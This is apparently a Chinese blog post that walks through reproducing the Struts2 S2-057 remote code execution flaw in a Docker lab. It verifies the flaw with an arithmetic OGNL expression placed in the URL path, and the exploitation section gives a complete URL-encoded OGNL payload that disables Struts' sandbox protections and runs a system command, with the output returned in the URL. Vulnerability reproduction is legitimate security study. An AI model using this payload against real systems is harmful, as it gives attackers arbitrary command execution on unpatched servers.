中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行Struts2-057 遠程代碼執行漏洞復現

發布時間:2021-12-24 21:59:21 來源:億速云 閱讀:207 作者:柒染 欄目:網絡管理

這篇文章將為大家詳細講解有關如何進行Struts2-057 遠程代碼執行漏洞復現,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

一、使用docker搭建環境

如何進行Struts2-057 遠程代碼執行漏洞復現

訪問頁面     http://ip:8080/struts2-showcase

如何進行Struts2-057 遠程代碼執行漏洞復現

二、漏洞驗證

訪問  /struts2-showcase/${(111+111)}/actionChain1.action  試試看

如何進行Struts2-057 遠程代碼執行漏洞復現

變成了  /struts2-showcase/222/register2.action

如何進行Struts2-057 遠程代碼執行漏洞復現

執行了,說明可能存在struts2-057漏洞

三、漏洞利用

執行命令的poc

/index/%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action

如何進行Struts2-057 遠程代碼執行漏洞復現

執行,得到了id命令執行的返回(url中)如何進行Struts2-057 遠程代碼執行漏洞復現

關于如何進行Struts2-057 遠程代碼執行漏洞復現就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

阿拉善右旗| 兴仁县| 保德县| 延长县| 滦南县| 扶风县| 衡阳县| 辽源市| 错那县| 招远市| 三河市| 武陟县| 清水县| 确山县| 沿河| 和林格尔县| 华坪县| 台安县| 嘉兴市| 文昌市| 石渠县| 昌都县| 阿图什市| 东海县| 铜陵市| 鞍山市| 成安县| 隆德县| 三江| 巴中市| 上杭县| 开鲁县| 延安市| 洛宁县| 巴里| 互助| 灵武市| 鲁山县| 平塘县| 孟连| 邵武市|